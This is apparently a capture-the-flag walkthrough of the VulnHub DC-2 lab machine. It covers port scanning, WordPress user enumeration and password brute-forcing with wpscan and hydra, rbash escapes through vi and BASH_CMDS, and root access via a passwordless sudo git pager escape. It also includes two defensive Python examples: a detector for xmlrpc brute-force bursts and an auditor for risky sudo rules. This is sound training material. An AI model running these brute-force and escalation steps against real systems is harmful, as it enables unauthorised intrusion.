vulnhub-DC-2

Information gathering

As usual, start with an nmap scan of all ports

└─# nmap -A -p1-65535 192.168.20.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-13 18:51 CST
Nmap scan report for 192.168.20.130
Host is up (0.0017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Did not follow redirect to http://dc-2/
|_http-server-header: Apache/2.4.10 (Debian)
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:27:CE:E2 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.68 ms 192.168.20.130

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.90 seconds

fscan never seems to give a very complete picture

└─# ./fscan -h 192.168.20.130 

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
192.168.20.130:80 open
[*] alive ports len is: 1
start vulscan
[*] WebTitle http://192.168.20.130 code:301 len:0 title:None 跳转url: http://dc-2/
已完成 1/1
[*] 扫描结束,耗时: 2.940933399s

We find that SSH has been moved to a non-standard port, 7744, and that there is a web service on 80. Visiting it redirects to a hostname, so name resolution has to be fixed by adding an entry to the hosts file

192.168.20.130 dc-2
#win C:\Windows\System32\drivers\etc\hosts
#LINUX /etc/hosts

Visiting the site again reveals flag1


Flag 1:

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

The hint is that cewl can harvest a wordlist from the site itself, and since it mentions passwords, the password is very likely in the harvested list

cewl http://dc-2/ -w resu.txt

The harvested wordlist is saved in resu.txt. Looking at the site, we can tell it is built on WordPress, which normally has an admin dashboard, so scan for it with dirb

─# dirb http://dc-2                          

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Nov 13 19:07:49 2024
URL_BASE: http://dc-2/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://dc-2/ ----
+ http://dc-2/index.php (CODE:301|SIZE:0)
+ http://dc-2/server-status (CODE:403|SIZE:292)
==> DIRECTORY: http://dc-2/wp-admin/
==> DIRECTORY: http://dc-2/wp-content/
==> DIRECTORY: http://dc-2/wp-includes/
+ http://dc-2/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://dc-2/wp-admin/ ----
+ http://dc-2/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://dc-2/wp-admin/css/
==> DIRECTORY: http://dc-2/wp-admin/images/
==> DIRECTORY: http://dc-2/wp-admin/includes/
+ http://dc-2/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://dc-2/wp-admin/js/
==> DIRECTORY: http://dc-2/wp-admin/maint/
==> DIRECTORY: http://dc-2/wp-admin/network/
==> DIRECTORY: http://dc-2/wp-admin/user/

---- Entering directory: http://dc-2/wp-content/ ----
+ http://dc-2/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://dc-2/wp-content/languages/
==> DIRECTORY: http://dc-2/wp-content/plugins/
==> DIRECTORY: http://dc-2/wp-content/themes/

Sure enough, there is a dashboard. We already have a password wordlist, so now use wpscan to check whether any usernames are exposed

└─# wpscan --url http://dc-2 -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.25

@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://dc-2/ [192.168.20.130]
[+] Started: Wed Nov 13 19:13:18 2024

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2024-07-16T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.7
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:02 <========================================================================================> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Nov 13 19:13:32 2024
[+] Requests Done: 74
[+] Cached Requests: 6
[+] Data Sent: 16.619 KB
[+] Data Received: 22.155 MB
[+] Memory used: 197.312 MB
[+] Elapsed time: 00:00:14

Password brute-forcing

With three users identified, we can now brute-force their passwords

─# wpscan --url http://dc-2 -U user.txt -P resu.txt 
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.20.130]
[+] Started: Wed Nov 13 19:15:46 2024

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2024-07-16T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.7
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:01 <=======================================================================================> (137 / 137) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
Trying admin / log Time: 00:02:08 <====================================================== > (646 / 1121) 57.62% ETA: ??:??:??

[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Nov 13 19:18:14 2024
[+] Requests Done: 788
[+] Cached Requests: 36
[+] Data Sent: 356.206 KB
[+] Data Received: 414.659 KB
[+] Memory used: 263.445 MB
[+] Elapsed time: 00:02:28

We can see that both jerry and tom were cracked. Logging into the dashboard, I noticed it did not redirect anywhere; I assumed the login had failed and was stuck on that for quite a while. From my own experience running a WordPress blog, after logging in you should go to url/wp-admin/edit.php. Logging in as each user in turn: tom has nothing, but jerry has flag2
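From the defender's side, the run above lands in the web server's access log as a burst of POST requests to /xmlrpc.php from a single client (788 requests in about two and a half minutes here). The following Python detector is an added example, not part of the original write-up: it counts POST /xmlrpc.php requests per client inside a sliding window and flags clients that exceed a threshold, run over a constructed Apache access-log sample (the client addresses, window and threshold are assumptions).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache combined log format; only the fields the rule needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec

def xmlrpc_bursts(lines, window=timedelta(seconds=60), threshold=20):
    """Map client IP -> largest number of POST /xmlrpc.php requests seen inside any
    `window`, for clients at or above `threshold`. Status codes are ignored on
    purpose: XML-RPC answers a wrong password with HTTP 200 and a faultCode."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].split("?")[0] == "/xmlrpc.php":
            per_ip[rec["ip"]].append(rec["ts"])
    alerts = {}
    for ip, times in per_ip.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):          # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts[ip] = best
    return alerts

# Constructed sample log: 25 guesses in 48 s from one client, plus ordinary traffic.
def _line(ip, ts, method, path, status):
    return f'{ip} - - [{ts.strftime(TS_FMT)}] "{method} {path} HTTP/1.1" {status} 42 "-" "WPScan v3.8.25"'

_T0 = datetime(2024, 11, 13, 19, 15, 46, tzinfo=timezone.utc)
SAMPLE_LOG = [_line("192.168.20.1", _T0 + timedelta(seconds=2 * i), "POST", "/xmlrpc.php", 200)
              for i in range(25)]
SAMPLE_LOG += [_line("192.168.20.55", _T0 + timedelta(seconds=10), "GET", "/index.php/feed/", 200),
               _line("192.168.20.55", _T0 + timedelta(seconds=30), "POST", "/xmlrpc.php", 200)]

if __name__ == "__main__":
    print(xmlrpc_bursts(SAMPLE_LOG))  # {'192.168.20.1': 25}
```

Pointing the same function at a real access log (one line per list element) gives the same report; the threshold should sit well above the number of legitimate pingbacks or app logins a site sees per minute.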

Flag 2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

This is really a hint that there is nothing more to find in WordPress, so we turn to SSH. We have two sets of credentials, and many users reuse passwords; trying them against SSH, tom can log in. If that had failed, the collected usernames and passwords could also be used for brute-forcing

hydra -L users.txt -P resu.txt -vV -o ssh.log -e ns IP ssh

After connecting we can see flag3, but the shell is restricted by rbash

There are many different restricted shells to choose from. Some of them are just ordinary shells with a few simple, common restrictions that are not really configurable, such as rbash (restricted Bash), rzsh and rksh (the Korn Shell in restricted mode); these are all very easy to bypass. Others have a full set of configuration options that can be tailored to the administrator's needs, such as lshell (Limited Shell) and rssh (Restricted Secure Shell).
Configurable shells are harder to bypass once the administrator has tightened the configuration. Bypass techniques on these shells usually rely on the fact that the administrator is more or less forced to give ordinary users certain unsafe commands. If these are allowed without a proper security configuration, they give an attacker the tools to escalate privileges, sometimes all the way to root.
Another reason is that administrators are sometimes just Linux sysadmins rather than real security professionals, so they do not really see things from a pentester's point of view and end up allowing too many dangerous commands.

In short, it restricts commands so that only a subset of the original commands may run. Let's see which commands we can execute

tom@DC-2:~$ compgen -c
if
then
else
elif
fi
case
esac
for
select
while
until
do
done
in
function
time
{
}
!
[[
]]
coproc
__expand_tilde_by_ref
__get_cword_at_cursor_by_ref
__git_eread
__git_ps1
__git_ps1_colorize_gitstring
__git_ps1_show_upstream
__grub_dir
__grub_get_last_option
__grub_get_options_from_help
__grub_get_options_from_usage
__grub_list_menuentries
__grub_list_modules
__grubcomp
__ltrim_colon_completions
__parse_options
__reassemble_comp_words_by_ref
_a2disconf
_a2dismod
_a2dissite
_a2enconf
_a2enmod
_a2ensite
_allowed_groups
_allowed_users
_apache2_allcomp
_apache2_conf
_apache2_mods
_apache2_sites
_available_interfaces
_cd
_cd_devices
_command
_command_offset
_complete_as_root
_completion_loader
_configured_interfaces
_count_args
_debconf_show
_dvd_devices
_expand
_filedir
_filedir_xspec
_fstypes
_get_comp_words_by_ref
_get_cword
_get_first_arg
_get_pword
_gids
_grub_editenv
_grub_install
_grub_mkconfig
_grub_mkfont
_grub_mkimage
_grub_mkpasswd_pbkdf2
_grub_mkrescue
_grub_probe
_grub_script_check
_grub_set_entry
_grub_setup
_have
_init_completion
_insserv
_installed_modules
_ip_addresses
_kernel_versions
_known_hosts
_known_hosts_real
_longopt
_mac_addresses
_minimal
_modules
_ncpus
_parse_help
_parse_usage
_pci_ids
_pgids
_pids
_pnames
_pygmentize
_quote_readline_by_ref
_realcommand
_rl_enabled
_root_command
_service
_services
_shells
_signals
_split_longopt
_sysvdirs
_terms
_tilde
_uids
_update_initramfs
_upvar
_upvars
_usb_ids
_user_at_host
_usergroup
_userland
_variables
_xfunc
_xinetd_services
dequote
quote
quote_readline
.
:
[
alias
bg
bind
break
builtin
caller
cd
command
compgen
complete
compopt
continue
declare
dirs
disown
echo
enable
eval
exec
exit
export
false
fc
fg
getopts
hash
help
history
jobs
kill
let
local
logout
mapfile
popd
printf
pushd
pwd
read
readarray
readonly
return
set
shift
shopt
source
suspend
test
times
trap
true
type
typeset
ulimit
umask
unalias
unset
wait
less
scp
ls
vi

Note vi and export: there are several ways to bypass the restriction here

vi bypass
vi <file>
esc
:set shell=/bin/sh
:shell
This method only gives you some commands, such as cd; commands like cat still cannot be executed

Environment-variable bypass
tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin
With this method cat becomes usable

flag4 is in /home/jerry, flag3 is in tom's folder, and flag4 contains a hint

$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now. :-)

Go on - git outta here!!!!

Privilege escalation

The hint clearly points to privilege escalation, and even without the git hint we could guess as much: on simple boxes like this it is usually sudo or SUID. Here it is sudo, but tom's password does not work for sudo, so switch to jerry

$ su jerry
Password:
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git

We find that git can be run as root
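Both the rbash whitelist seen earlier (less, scp, vi at the end of tom's compgen -c) and this sudoers rule fail for the same reason: the permitted binary can hand the user a shell. The following audit helper is an added example, not part of the original write-up: it parses a constructed sudoers fragment (the jerry rule is copied from the sudo -l output above, the other entries are made up) and an rbash command whitelist, and reports entries that belong to a small, hypothetical list of shell-escape-capable binaries.

```python
import os
import re
# Commands that let the caller escape to a shell or run arbitrary commands (git through
# its pager, vi via :shell, less via !, scp via -S). Seeded from DC-2; extend as needed.
SHELL_ESCAPE_BINS = {"git", "vi", "vim", "less", "more", "scp"}
# user host=(runas) TAG: cmd, cmd   (a simplified sudoers grammar, no aliases)
SUDO_RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

def parse_sudoers(text):
    """Yield (user, runas, tags, [cmds]) for each user specification line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = SUDO_RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        yield m.group("user"), m.group("runas") or "root", tags, cmds

def risky_sudo_rules(text):
    """(user, runas, binary, nopasswd) for non-root rules granting ALL or a shell-escape binary."""
    findings = []
    for user, runas, tags, cmds in parse_sudoers(text):
        if user == "root":
            continue
        for cmd in cmds:
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL" or binary in SHELL_ESCAPE_BINS:
                findings.append((user, runas, binary, "NOPASSWD" in tags))
    return findings

def restricted_shell_gaps(allowed_cmds):
    """Commands in an rbash user's PATH whitelist that defeat the restriction."""
    return set(allowed_cmds) & SHELL_ESCAPE_BINS

# Constructed sudoers sample; the jerry line reproduces the sudo -l output on DC-2.
SAMPLE_SUDOERS = """\
Defaults env_reset, mail_badpass
Defaults secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
root     ALL=(ALL:ALL) ALL
jerry    ALL=(root) NOPASSWD: /usr/bin/git
backup   ALL=(root) NOPASSWD: /usr/bin/id, /usr/bin/less
www-data ALL=(root) /usr/sbin/service apache2 restart
"""

if __name__ == "__main__":
    print(risky_sudo_rules(SAMPLE_SUDOERS))
    print(restricted_shell_gaps(["less", "scp", "ls", "vi"]))  # tail of tom's compgen -c
```

The fix on the sudo side is to grant only the specific git subcommand needed (or none at all), and on the rbash side to keep editors, pagers and file-transfer tools out of the restricted user's PATH directory.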

sudo git help config
!/bin/bash

root@DC-2:/home/jerry# whoami
root
root@DC-2:/home/jerry# ls /root
final-flag.txt
root@DC-2:/home/jerry# cat /root/final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

With that, the box is done

Conclusion

This is another basic box. It mainly tests information gathering and using the collected information from several angles, DNS (the hosts entry), and privilege escalation through git